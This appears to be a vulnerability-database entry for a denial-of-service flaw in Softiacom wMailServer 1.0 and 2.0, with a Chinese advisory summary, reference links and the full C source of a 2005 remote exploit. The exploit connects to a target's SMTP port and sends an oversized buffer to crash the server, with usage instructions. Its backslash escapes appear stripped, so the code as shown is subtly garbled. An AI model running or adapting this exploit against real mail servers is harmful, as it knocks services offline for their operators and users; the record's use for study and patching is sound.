https://www.exploit-db.com/exploits/1101
https://www.securityfocus.com/bid/89436
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-200

SoftiacomwMailserver是一款用于Win平台的邮件服务软件。SoftiaComwMailServer1.0及2.0版本中存在拒绝服务漏洞。远程攻击者通过可能触发缓冲区溢出的具有前导空格的大型TCP数据包，可使系统拒绝服务(应用程序崩溃)。

/*****************************************************************

wMailServer Remote D.o.S Exploit by Kozan

Application: wMailServer
Vendor: Softiacom Software - www.softiacom.com

Discovered by: fRoGGz - SecuBox Labs
Exploit Coded by: Kozan
Credits to ATmaCA, fRoGGz, SecuBox Labs
Web: www.spyinstructors.com
Mail: [email protected]

*****************************************************************/

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>

#pragma comment(lib,"ws2_32.lib")

char Buff[] =
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41";

int main(int argc, char *argv[])
{
       fprintf(stdout, "wMailServer Remote D.o.S Exploit by Kozann");
       fprintf(stdout, "Discovered by: fRoGGz - SecuBox Labsn");
       fprintf(stdout, "Exploit Coded by: Kozann");
       fprintf(stdout, "Credits to ATmaCA, fRoGGz, SecuBox Labsnn");
       fprintf(stdout, "www.spyinstructors.com - [email protected]");

       if(argc<2)
       {
               fprintf(stderr, "nnUsage: %s [Target IP]nn", argv[0]);
               return -1;
       }
       WSADATA wsaData;
       SOCKET sock;

       if( WSAStartup(0x0101,&wsaData) < 0 )
       {
               fprintf(stderr, "Winsock error!n");
               return -1;
       }

       sock = socket(AF_INET,SOCK_STREAM,0);
       if( sock == -1 )
       {
               fprintf(stderr, "Socket error!n");
               return -1;
       }

       struct sockaddr_in addr;

       addr.sin_family = AF_INET;
       addr.sin_port = htons(25);
       addr.sin_addr.s_addr = inet_addr(argv[1]);
       memset(&(addr.sin_zero), '', 8);

       if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
       {
               fprintf(stderr, "Connection failed!n");
               closesocket(sock);
               return -1;
       }

       if( send(sock,Buff,strlen(Buff),0) == -1 )
       {
               fprintf(stderr, "DoS string could not sent!n");
               closesocket(sock);
               return -1;
       }

       fprintf(stdout, "Operation completed...n");
       closesocket(sock);
       WSACleanup();

       return 0;
}

// milw0rm.com [2005-07-12]

SoftiaCom WMailserver 2.0

SoftiaCom WMailserver 1.0

来源:BUGTRAQ
名称:20050712SoftiaComMailServerv2.0-DenialOfService
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112122500308722&w;=2